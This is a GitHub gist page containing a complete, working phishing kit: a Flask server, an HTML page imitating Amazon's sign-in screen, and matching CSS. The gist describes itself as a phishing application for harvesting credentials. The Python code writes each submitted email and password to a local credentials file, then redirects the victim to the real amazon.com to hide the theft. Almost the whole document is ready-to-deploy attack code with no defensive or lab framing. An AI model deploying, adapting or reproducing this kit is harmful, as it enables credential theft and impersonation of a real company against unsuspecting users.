Created
February 4, 2024 02:04
-
-
Save RoseSecurity/0ee09db8d764b85794a1fb38ac726a0f to your computer and use it in GitHub Desktop.
An AWS Flask phishing application for harvesting credentials from mobile and desktop device logins.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from flask import Flask, render_template, request, redirect | |
import os | |
# AWS Flask phishing application for harvesting credentials from mobile and desktop device logins. | |
# For the application to work, place the index.html file the templates directory and the style.css file in the static directory | |
app = Flask(__name__) | |
# Specify absolute path for the file | |
BASE_DIR = os.path.abspath(os.path.dirname(__file__)) | |
CREDENTIALS_FILE = os.path.join(BASE_DIR, 'credentials.txt') | |
@app.route('/') | |
def index(): | |
return render_template('index.html') | |
@app.route('/submit', methods=['POST']) | |
def submit(): | |
if request.method == 'POST': | |
email = request.form.get('email') | |
password = request.form.get('password') | |
try: | |
with open(CREDENTIALS_FILE, 'a') as f: | |
f.write(f"Email: {email}, Password: {password}\n") | |
except Exception as e: | |
return f"Error writing to file: {str(e)}" | |
# Redirect the user to Amazon.com after logging the credentials | |
return redirect("https://www.amazon.com") | |
if __name__ == '__main__': | |
app.run(host='0.0.0.0', port=80, debug=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Amazon Sign In</title> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<link rel="stylesheet" href="static/style.css"> | |
<style> | |
body { | |
margin: 0; | |
padding: 0; | |
width: 100%; | |
height: 100%; | |
font-family: Arial, sans-serif; | |
} | |
#container { | |
width: 100%; | |
height: 100%; | |
display: flex; | |
flex-direction: column; | |
align-items: center; | |
justify-content: center; | |
} | |
#signInBorder { | |
padding: 20px; | |
border: 1px solid #ccc; | |
border-radius: 10px; | |
background-color: #f9f9f9; | |
} | |
</style> | |
</head> | |
<body> | |
<div id="container"> | |
<div id="signInBorder"> | |
<p id="SignInTxt"> | |
Sign in | |
</p> | |
<form action="/submit" method="post"> | |
<label> | |
<strong>Email (phone for mobile accounts)</strong> | |
<br> | |
<input type="email" id="email" name="email" value=""> | |
</label> | |
<br> | |
<label> | |
<strong>Password</strong> | |
<span><a href="#" id="password">Forgot your password?</a></span> | |
<br> | |
<input type="password" id="passwordInput" name="password" value=""> | |
</label> | |
<div> | |
<button id="amazon">Sign in</button> | |
</div> | |
</form> | |
<div id="createAccount"> | |
<h2><span>New to Amazon?</span></h2> | |
<button id="newAccount" name="newAcct">Create your Amazon account</button> | |
</div> | |
</div> | |
</div> | |
<hr id="footer"> | |
<div class="extra"> | |
<p class="links"><a href="#" id="first">Conditions of Use</a> | |
<a href="#">Notice of Use</a> | |
<a href="#">Help</a></p> | |
<p class="links" id="special"> | |
© 1996-2024, Amazon.com, Inc. or its affiliates | |
</p> | |
</div> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#amazon{ | |
width:315px; | |
height:33px; | |
font-size:14px; | |
background: linear-gradient(#F7DEA1, #F0C14D); | |
border: 0.5px solid #aaaaaa; | |
border-radius:3px; | |
margin-top: 10px; | |
} | |
#amazon:hover{ | |
background: linear-gradient(#F5D68A, #EEBA36); | |
} | |
body { | |
font-size: 13px; | |
line-height: 19px; | |
color: #111; | |
font-family: Arial,sans-serif; | |
} | |
img{ | |
margin: auto; | |
display: block; | |
} | |
#signInBorder{ | |
position: static; | |
margin: 0 auto; | |
border-color: #DDDDDD; | |
border: 0.5px solid #DDDDDD; | |
border-radius: 3px; | |
width: 340px; | |
padding-left: 25px; | |
} | |
input{ | |
border-left-color: #DDDDDD; | |
border-right-color: #DDDDDD; | |
border-radius: 3px; | |
border-width: 0.2px; | |
height: 25px; | |
width: 315px; | |
margin-bottom: 15px; | |
} | |
input:focus{ | |
-webkit-box-shadow: 0px 0px 1.5px 1.5px rgba(231,118,0,0.9); | |
-moz-box-shadow: 0px 0px 1.5px 1.5px rgba(231,118,0,0.9); | |
box-shadow: 0px 0px 1.5px 1.5px rgba(231,118,0,0.9); | |
outline:0; | |
} | |
#SignInTxt{ | |
font-family: Arial, sans-serif; | |
font-size: 26.5px; | |
} | |
h2 { | |
color: rgb(134, 134, 134); | |
font-weight: normal; | |
letter-spacing: 1px; | |
font-size: 11.5px; | |
width: 315px; | |
text-align: center; | |
border-top: 1px solid rgba(0, 0, 0, 0.1); | |
border-bottom: 1px solid rgba(255, 255, 255, 0.3); | |
line-height: 0.1em; | |
margin: 10px 0 20px; | |
margin-bottom: 5px; | |
} | |
h2 span { | |
background:#fff; | |
padding:0 10px; | |
} | |
#createAccount{ | |
margin-top: 30px; | |
} | |
#newAccount{ | |
background: linear-gradient(#f6f7f9, #e7e9ec); | |
margin-top: 10px; | |
margin-bottom: 20px; | |
width:315px; | |
height:33px; | |
font-size:14px; | |
border: 0.5px solid #aaaaaa; | |
border-radius:3px; | |
} | |
#newAccount:hover{ | |
background: linear-gradient(#f5f6f8, #d9dce1); | |
} | |
#footer{ | |
border: 0; | |
height: 0; | |
border-top: 1px solid rgba(0, 0, 0, 0.1); | |
border-bottom: 1px solid rgba(255, 255, 255, 0.3); | |
margin-top: 30px; | |
} | |
a:link{ | |
font-size: 12px; | |
/*margin: 0 10px 0px 10px;*/ | |
margin-right: 10px; | |
text-decoration: none; | |
color: #0066c0 | |
} | |
a:hover{ | |
text-decoration: underline; | |
color: orangergb(230, 161, 28); | |
} | |
a:visited{ | |
color: #0066c0; | |
} | |
.links{ | |
font-size: 10px; | |
text-align: center; | |
padding-left: 15px; | |
} | |
#password{ | |
margin-left: 125px; | |
} | |
#special{ | |
font-size: 11px; | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment